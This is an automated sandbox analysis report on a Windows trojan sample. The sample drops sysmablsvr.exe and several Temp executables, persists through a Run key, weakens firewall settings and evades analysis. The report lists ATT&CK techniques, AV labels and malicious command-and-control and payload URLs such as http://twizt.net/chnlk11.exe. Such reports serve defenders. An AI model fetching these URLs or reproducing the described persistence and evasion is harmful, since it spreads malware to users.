                          Source: C:\Windows\sysmablsvr.exe | Process created: C:\Users\user\AppData\Local\Temp\2958729589.exe C:\Users\user\AppData\Local\Temp\2958729589.exe
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: apphelp.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: urlmon.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: wininet.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: iertutil.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: srvcli.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: netutils.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: uxtheme.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: sspicli.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: windows.storage.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: wldp.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: profapi.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: winhttp.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: iphlpapi.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: mswsock.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: winnsi.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: napinsp.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: pnrpnsp.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: wshbth.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: nlaapi.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: dnsapi.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: winrnr.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: fwpuclnt.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: rasadhlp.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: firewallapi.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: fwbase.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: fwpolicyiomgr.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: cryptsp.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: rsaenh.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: cryptbase.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: urlmon.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: wininet.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: iertutil.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: srvcli.dll
                          Source: C:\Windows\sysmablsvr.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Section loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Section loaded: wkscli.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exe | Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exe | Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exe | Section loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exe | Section loaded: wkscli.dll
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exe | Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exe | Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exe | Section loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exe | Section loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exe | Section loaded: wkscli.dll
                          Source: C:\Windows\sysmablsvr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Code function: 6_2_006E1DF1 push ecx; ret | 6_2_006E1E04
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Code function: 7_2_00221771 push ecx; ret | 7_2_00221784
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exe | Code function: 9_2_00A31DF1 push ecx; ret | 9_2_00A31E04
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exe | Code function: 10_2_003D1DF1 push ecx; ret | 10_2_003D1E04

                          Persistence and Installation Behavior

                          Source: C:\Users\user\Desktop\file.exe | Executable created and started: C:\Windows\sysmablsvr.exe
                          Source: C:\Windows\sysmablsvr.exe | File created: C:\Users\user\AppData\Local\Temp\158752420.exe
                          Source: C:\Windows\sysmablsvr.exe | File created: C:\Users\user\AppData\Local\Temp\259428477.exe
                          Source: C:\Windows\sysmablsvr.exe | File created: C:\Users\user\AppData\Local\Temp\2958729589.exe
                          Source: C:\Windows\sysmablsvr.exe | File created: C:\Users\user\AppData\Local\Temp\524024912.exe
                          Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\sysmablsvr.exe
                          Source: C:\Windows\sysmablsvr.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS
                          Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\sysmablsvr.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, value name: CheckedValue
                          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\Desktop\file.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Windows\sysmablsvr.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\21548511.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\193855420.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\158752420.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\524024912.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\356818234.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\3079321897.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\259428477.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\239315810.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\3022733304.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Windows\sysmablsvr.exe | File opened: C:\Users\user\AppData\Local\Temp\2958729589.exe:Zone.Identifier (read attributes | delete)
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exe | Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040D280
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_0040D280
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040D280
                          Source: C:\Windows\sysmablsvr.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_1-4382)
                          Source: C:\Windows\sysmablsvr.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_1-4382)
                          Source: C:\Windows\sysmablsvr.exe | Window / User API: threadDelayed 3256
                          Source: C:\Windows\sysmablsvr.exe | Window / User API: threadDelayed 1651
                          Source: C:\Windows\sysmablsvr.exe | Window / User API: threadDelayed 597
                          Source: C:\Windows\sysmablsvr.exe | Window / User API: threadDelayed 1009
                          Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-4401)
                          Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-4382)
                          Source: C:\Windows\sysmablsvr.exe | Evaded block: after key decision (graph_2-4380)
                          Source: C:\Windows\sysmablsvr.exe | Evasive API call chain: RegQueryValue,DecisionNodes,Sleep (graph_2-5345)
                          Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_0-4435)
                          Source: C:\Windows\sysmablsvr.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_1-4404)
                          Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: RegQueryValue,DecisionNodes,Sleep (graph_0-5346)
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_6-322)
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Users\user\Desktop\file.exe | API coverage: 3.6 %
                          Source: C:\Windows\sysmablsvr.exe | API coverage: 0.9 %
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040D280
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040D280
                          Source: C:\Windows\sysmablsvr.exe TID: 6772 | Thread sleep time: -60000s >= -30000s
                          Source: C:\Windows\sysmablsvr.exe TID: 5232 | Thread sleep count: 3256 > 30
                          Source: C:\Windows\sysmablsvr.exe TID: 5232 | Thread sleep time: -6512000s >= -30000s
                          Source: C:\Windows\sysmablsvr.exe TID: 6772 | Thread sleep count: 1651 > 30
                          Source: C:\Windows\sysmablsvr.exe TID: 3872 | Thread sleep count: 597 > 30
                          Source: C:\Windows\sysmablsvr.exe TID: 5764 | Thread sleep time: -123775s >= -30000s
                          Source: C:\Windows\sysmablsvr.exe TID: 5232 | Thread sleep count: 1009 > 30
                          Source: C:\Windows\sysmablsvr.exe TID: 5232 | Thread sleep time: -2018000s >= -30000s
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect
                          Source: C:\Windows\sysmablsvr.exe | Thread delayed: delay time: 60000
                          Source: C:\Windows\sysmablsvr.exe | Thread delayed: delay time: 123775
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.000000000067E000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878878518.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878685410.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, 524024912.exe, 00000007.00000002.2490877099.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, 524024912.exe, 00000007.00000002.2490877099.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878878518.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878685410.00000000006DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWCP
                          Source: C:\Windows\sysmablsvr.exe | API call chain: ExitProcess graph end node (graph_1-4425)
                          Source: C:\Windows\sysmablsvr.exe | API call chain: ExitProcess graph end node (graph_2-4423)
                          Source: C:\Windows\sysmablsvr.exe | API call chain: ExitProcess graph end node (graph_2-4391)
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Code function: 7_2_002218A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A470 GetProcessHeaps
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Code function: 6_2_006E1B24 SetUnhandledExceptionFilter
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Code function: 7_2_002218A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess
                          Source: C:\Users\user\AppData\Local\Temp\259428477.exe | Code function: 9_2_00A31B24 SetUnhandledExceptionFilter
                          Source: C:\Users\user\AppData\Local\Temp\2958729589.exe | Code function: 10_2_003D1B24 SetUnhandledExceptionFilter
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040ECC0 GetLocaleInfoA,strcmp
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_0040ECC0 GetLocaleInfoA,strcmp
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040ECC0 GetLocaleInfoA,strcmp
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Code function: 6_2_006E1E58 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | Code function: 6_2_006E14E0 memset,GetModuleHandleW,GetProcAddress,memset,GetVersionExA,memset,GetVersionExA

                          Lowering of HIPS / PFW / Operating System Security Settings

                          Source: C:\Windows\sysmablsvr.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center, value name: FirewallOverride

                          Remote Access Functionality

                          Source: Yara match | File source: file.exe, type: SAMPLE
                          Source: Yara match | File source: 2.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000003.1805000272.0000000000547000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: sysmablsvr.exe PID: 6768, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: sysmablsvr.exe PID: 2148, type: MEMORYSTR
                          Source: Yara match | File source: C:\Windows\sysmablsvr.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DCA0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004013B0 CreateEventA,socket,bind,CreateThread
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_0040DCA0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_004013B0 CreateEventA,socket,bind,CreateThread
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040DCA0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_004013B0 CreateEventA,socket,bind,CreateThread
                          MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count shown in the report for that technique)

                          Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
                          Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
                          Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
                          Execution: 12 Native API, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
                          Persistence: 1 Windows Service, 1 Registry Run Keys / Startup Folder, 1 DLL Side-Loading, Login Hook, Network Logon Script, RC Scripts, Startup Items
                          Privilege Escalation: 1 Windows Service, 1 Process Injection, 1 Registry Run Keys / Startup Folder, 1 DLL Side-Loading, Network Logon Script, RC Scripts, Startup Items
                          Defense Evasion: 121 Masquerading, 1 Disable or Modify Tools, 11 Virtualization/Sandbox Evasion, 1 Process Injection, 2 Hidden Files and Directories, 1 Obfuscated Files or Information, 1 DLL Side-Loading
                          Credential Access: 11 Input Capture, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
                          Discovery: 1 System Time Discovery, 231 Security Software Discovery, 11 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 System Network Connections Discovery, 1 File and Directory Discovery, 15 System Information Discovery
                          Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
                          Collection: 11 Input Capture, 1 Archive Collected Data, 3 Clipboard Data, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
                          Command and Control: 2 Encrypted Channel, 1 Non-Standard Port, 4 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Multiband Communication, Commonly Used Port
                          Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
                          Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
                          Behavior Graph (ID: 1512821, Sample: file.exe, Startdate: 17/09/2024, Architecture: WINDOWS, Score: 100)

                          Root-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 5 other signatures.
                          file.exe drops C:\Windows\sysmablsvr.exe (PE32) and starts it. Signatures on file.exe: Contains functionality to check if Internet connection is working; Drops executables to the windows directory (C:\Windows) and starts them; Hides that the sample has been downloaded from the Internet (zone.identifier); Contains functionality to detect sleep reduction / modifications.
                          sysmablsvr.exe contacts 185.215.113.66 (ports 49730, 49732, 49734; WHOLESALECONNECTIONSNL, Portugal), 100.109.48.43 (port 40500; UUNETUS, Reserved) and 85 other IPs or domains. It drops C:\Users\user\AppData\Local\...\524024912.exe, C:\Users\user\AppData\...\2958729589.exe, C:\Users\user\AppData\Local\...\259428477.exe (all PE32) and 7 other malicious files. Signatures on sysmablsvr.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 6 other signatures.
                          sysmablsvr.exe starts 524024912.exe, 158752420.exe, 259428477.exe and 2958729589.exe. Signatures on 524024912.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file.

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample (Source | Detection | Scanner | Label)
                          file.exe | 84% | ReversingLabs | Win32.Trojan.MintZard
                          file.exe | 100% | Avira | HEUR/AGEN.1315882
                          file.exe | 100% | Joe Sandbox ML |

                          Dropped Files (Source | Detection | Scanner | Label)
                          C:\Users\user\AppData\Local\Temp\524024912.exe | 100% | Avira | TR/Dldr.Agent.gqemd
                          C:\Windows\sysmablsvr.exe | 100% | Avira | HEUR/AGEN.1315882
                          C:\Windows\sysmablsvr.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\524024912.exe | 75% | ReversingLabs | Win32.Infostealer.Tinba
                          C:\Windows\sysmablsvr.exe | 84% | ReversingLabs | Win32.Trojan.MintZard

                          Unpacked PE Files: No Antivirus matches
                          Domains: No Antivirus matches
                          No contacted domains info

                          Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
                          http://185.215.113.66/1 | true | Avira URL Cloud: safe | unknown

                          URLs from Memory and Binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
                          http://77.91.77.92/4 | sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                          http://77.91.77.92/ | file.exe, sysmablsvr.exe.0.dr | true | Avira URL Cloud: safe | unknown
                          http://77.91.77.92/5 | sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          http://77.91.77.92/1/6T | sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          http://77.91.77.92/2 | sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234854329.000000000221B000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          http://twizt.net/chnlk11.exe | sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.dr | false | Avira URL Cloud: phishing | unknown
